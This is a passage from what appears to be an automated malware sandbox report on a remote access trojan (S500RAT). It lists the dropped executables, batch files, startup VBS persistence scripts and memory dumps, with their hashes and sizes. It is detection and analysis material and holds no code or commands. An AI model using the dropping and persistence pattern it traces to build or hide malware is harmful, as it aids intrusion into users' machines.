                    "C:\Users\Admin\system\system.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\S500RAT.exe.log

      Filesize

      42B

      MD5

      84cfdb4b995b1dbf543b26b86c863adc

      SHA1

      d2f47764908bf30036cf8248b9ff5541e2711fa2

      SHA256

      d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

      SHA512

      485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      f3c09cd778e1a0b1fdd6cbc74036bf4b

      SHA1

      20c86d7a83204e7a99c3c99acf79f891961e9b5e

      SHA256

      5b74d916934b7c3a1c0ad0c2716827f7a8fbf5722e9cc5a12a74e0e8834e5e25

      SHA512

      fe58e5014c7a5753b204f8e22f5e708642d8aa5e22c0b7b4107d4c8dc95d6ad1f3cbbe2ec823140f2a310437c10c2ea8d8ffb1a191520040f7824c121642fb9c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      bceed48e720d53a41dfa3c7c73f23f0f

      SHA1

      d06284e9e184a924efb235e8abc8ec19348b8c2d

      SHA256

      2a94a7e6d5247e4f03a36f6c9cd1e24c394bdbcdf46b9a866ad7823d0483d019

      SHA512

      402a0006b17a603c3a8c6ebc566579d1fe1a27e5d834ebe3cb1420d09d829ef261de2b4e62b6fce3624e93fe42dbfa21d4bb7063469c480ae4d9c5568d5df31f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      b70bb42b5f053a986ba1a544817bf722

      SHA1

      c26f5c74ae56f37efbe7ce61a1a15bd5cc215f13

      SHA256

      b15e56fef36d411e28adfaf6914511300756706527fcfa65598177f5f6a0299b

      SHA512

      1ce6c9261bdc04cab0264689da6a70e3943d7b7db0adb375cf7cfc71ff8505127047f0b9b52ed6e707b6bf388baeafe735955aa4e4ccf231085ff91de2605292

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      dbbf71e9fb59f80938f09809b160e441

      SHA1

      8b9a517d846cb9a0a284f77ed88328236a85055f

      SHA256

      e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

      SHA512

      90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      1cc5e033811a5d520bb4a6904b5c433b

      SHA1

      c159a342ed372790600b3a6ac97e274638a0ce9a

      SHA256

      9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

      SHA512

      dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      eb1ad317bd25b55b2bbdce8a28a74a94

      SHA1

      98a3978be4d10d62e7411946474579ee5bdc5ea6

      SHA256

      9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

      SHA512

      d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      9c740b7699e2363ac4ecdf496520ca35

      SHA1

      aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

      SHA256

      be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

      SHA512

      8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

    • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe

      Filesize

      18.8MB

      MD5

      017ab96e80048ff5c16c045f0b07dd5c

      SHA1

      81d29230438596bc35d5c20a3c5077c6f6bf286a

      SHA256

      baf65c88b4d48cb3701f9dc503f9800e06b490e169c8f3668f250052c703ee62

      SHA512

      8a2fb18187f6432a4c266de6dbda7b98d1838838a73dc9a593d2f814336d5842ea3ce101a60714aabc735390560b6c61e66166c0a643646c7e5aa994c59f2987

    • C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat

      Filesize

      262KB

      MD5

      ad0c8112fc6de16730b2c05452bd5a5d

      SHA1

      de5c18c8b52136d3f36eb309d2cab5a94217b80f

      SHA256

      3ca4327561a8b88204b8716306fccf8815ba3ea515d5f213c810355fa66d19c7

      SHA512

      5d854c0cb895c989d06b49b7004ef2747dbbd3225f066cd84792e9c99238f03cd63b3943729a7853b00b49492d5ab0525b37999a97f23a46ce1486ede770f780

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rucuygmh.prx.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\invoicer.bat

      Filesize

      284KB

      MD5

      f4d1ac2353407590dd8f02cac6b2104a

      SHA1

      9681117cd8ea67bc8b3907004e9ce808ca0187ec

      SHA256

      3c7c299737de3ff60f8c30f000c0a9f3454396acc1dce473e1e1a2696bbc67b7

      SHA512

      7d4e6dbf7ea33a5a020df56e001928ef8b387b8d7eae8d26f5f591790553ab102a7186cd39ef937ab895976b504ae4a2540b7f2405a7d2ab81fbb87575da2082

    • C:\Users\Admin\AppData\Local\Temp\tmpFA1F.tmp.bat

      Filesize

      141B

      MD5

      943ea75773f7b07665995c9574d530ba

      SHA1

      558bf7e899d3543ed3d8ae04062dbcc020fc8a5e

      SHA256

      e33ff924968f97c4f2293bec3faf01c781b296acee6a3316218fa3dddb356714

      SHA512

      8a58aaa2528e96e66afa281868cd1c1887de5eb8eb034f961c7c27c07217312509e07a797020d5c155dd26512fb2db602cdde54362014efcc9ec3c418e56cd81

    • C:\Users\Admin\AppData\Roaming\startup_str_166.vbs

      Filesize

      115B

      MD5

      368b9ef45437db3c8d74b131165dac4a

      SHA1

      08814e207c36f531b3e3efe6eed7c7f45d3ea90e

      SHA256

      983ace1ff7d7220f5bb2dea998f4f603f7869e013e25f9329af6ba02d58b3681

      SHA512

      1879ec6fad3e5ee3a4e3aefd7edc0cddfb1ab8a4cc5aa8e60fe7ab8d76abaa6e60fc0af9b1477abb9c519b0bb8f4d3f8ee07f925bb2ba1dd7d5692a605223c5b

    • C:\Users\Admin\AppData\Roaming\startup_str_531.vbs

      Filesize

      115B

      MD5

      d8b0aa12a851fd960ac47498fa371da2

      SHA1

      bab8853105e1e56530d338ceac9ca92fcce018b0

      SHA256

      6cd22a5a0f25e981fe813327be8bd748128c6b4f040da666cb7446139c7f61f8

      SHA512

      bf5c7931971d4d3c4042da1452d4107481766a65d8a4d334d4b522063a498ca0f8e3185760854309610a53d855c517b2557110b858a409128ab9b2dcb04d51c8

    • C:\Users\Admin\AppData\Roaming\startup_str_58.vbs

      Filesize

      114B

      MD5

      83a11e2dd07ab08994530007211b737b

      SHA1

      fd062ce0480df511b63c0bbadabb8b5da64e81e2

      SHA256

      33972f8ea009e89bdd302035e3e949ca3b8db4bb7fd733b2f62a16e52742575c

      SHA512

      86af9e36b608b5f1ee4af5e4f5ea700f0223c4e812d650457d6e72ad712057440c5aac89f45009914224961b01fb0459fdb04cf8c0aa6cc2857dc79828cbd27a

    • C:\Users\Admin\AppData\Roaming\startup_str_85.vbs

      Filesize

      114B

      MD5

      01240672968c73d837a0cf158ca84d95

      SHA1

      008a4ab9d5d9ad02148e129ee8dc58242764a095

      SHA256

      ef753dbe92d4d8769f52b0d564081675185bb435dbf6c1cc68d35e6935346534

      SHA512

      b45d5c92d0d61a318bb37955b9a68d740c363768a69c42884dafc645b7e73a79fff8168a79ebc9a5ed02dd3f3277b7f4815e425cfd6544c612f5e27c26a5860f

    • C:\Users\Admin\system\system.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • memory/1548-264-0x000001BE35F10000-0x000001BE35F54000-memory.dmp

      Filesize

      272KB

    • memory/1548-265-0x000001BE36380000-0x000001BE363F6000-memory.dmp

      Filesize

      472KB

    • memory/2652-102-0x000002266FD90000-0x000002266FDC8000-memory.dmp

      Filesize

      224KB

    • memory/2652-88-0x000002266D910000-0x000002266D918000-memory.dmp

      Filesize

      32KB

    • memory/2956-223-0x00000198D7B30000-0x00000198D7B46000-memory.dmp

      Filesize

      88KB

    • memory/3380-0-0x00007FF99E1E3000-0x00007FF99E1E5000-memory.dmp

      Filesize

      8KB

    • memory/3380-72-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/3380-2-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/3380-1-0x0000000000840000-0x0000000001B70000-memory.dmp

      Filesize

      19.2MB

    • memory/3548-205-0x000001BFF9C20000-0x000001BFF9C2E000-memory.dmp

      Filesize

      56KB

    • memory/3976-99-0x0000020640C30000-0x0000020640C38000-memory.dmp

      Filesize

      32KB

    • memory/3976-101-0x0000020640C60000-0x0000020640C94000-memory.dmp

      Filesize

      208KB

    • memory/4116-31-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/4116-28-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/4116-27-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/4116-17-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/4116-16-0x000001FF37A60000-0x000001FF37A82000-memory.dmp

      Filesize

      136KB

    • memory/4300-109-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB

    • memory/4300-15-0x00000000001E0000-0x00000000014AA000-memory.dmp

      Filesize

      18.8MB

    • memory/4300-14-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

      Filesize

      10.8MB